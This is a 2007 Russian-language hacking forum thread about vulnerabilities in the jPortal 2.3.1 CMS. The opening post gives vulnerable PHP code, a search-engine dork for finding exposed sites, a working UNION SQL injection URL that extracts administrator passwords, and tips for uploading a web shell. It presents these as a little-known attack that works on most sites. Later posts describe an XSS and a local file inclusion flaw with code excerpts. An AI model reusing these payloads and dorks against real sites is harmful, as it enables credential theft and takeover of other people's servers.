JPoprtal 2.3.1 и ниже SQL иньекция.

Discussion in 'Веб-уязвимости' started by Alexsize, 9 Nov 2007.

  1. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Популярная в Польше CMS.
    Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
    Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

    Уязвимый код:

    PHP:
    function topic_name($a
    {    
    global 
    $topic_tbl;
    $query "SELECT * FROM $topic_tbl WHERE id=$a";
    $result mysql_query($query);  
    $r mysql_fetch_array($result);    
    return 
    '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';  
    }
    Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

    Code:
    articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/
    В более старых версиях jp_admins. Также есть таблица users или jp_users.

    Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.
     
    #1 Alexsize, 9 Nov 2007
    Last edited: 9 Nov 2007
    7 people like this.
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    ещё одна https://forum.antichat.ru/thread53101.html
    ЗЫ один минус: на многих стоят детекторы атаки sql-inj
     
  3. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    _http://milw0rm.com/exploits/4614
     
    1 person likes this.
  4. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    JPoprtal 2.3.1 Passive XSS and Local File Inclusion.

    Passive XSS in "theme/Default/index.php" :
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title><? echo $site_name ?> - <? echo $site_title ?></title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
    <? echo $head_info ?>
    <? echo $meta_info ?>
    <link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">
    
    Если registers_global=On, то через переменные $site_name, $site_title, $head_info, $meta_info
    и $theme можно передать XSS-вектор.
    Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php.

    Local File Inclusion in "module.php":
    Code:
    function module($op) {
    global $error;
    
    if(file_exists('module/'.$op.'.aim.php')) {
    include('module/'.$op.'.aim.php'); /* (2) */
    } elseif($op=='') {
    header("Location: index.php");
    exit;
    } else {
    $error = 'e1';
    }
    }
    [...]
    module($op); /* (1) */
    Переменная $op передается в функцию module() [1] через GET,
    затем в include() [2] $op используется как есть.

    (с)Daath
     
    #4 [53x]Shadow, 14 Nov 2007
    Last edited: 14 Nov 2007
    1 person likes this.
  5. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Насчет локал инклуда могу сказать точно - большинство сайтов от него закрыты. Я не стал его постить поэтому. Про ксс тоже знал, правда активную. Кое где ее неумело поприменяли=) Но рыть ее не стал.
     
    1 person likes this.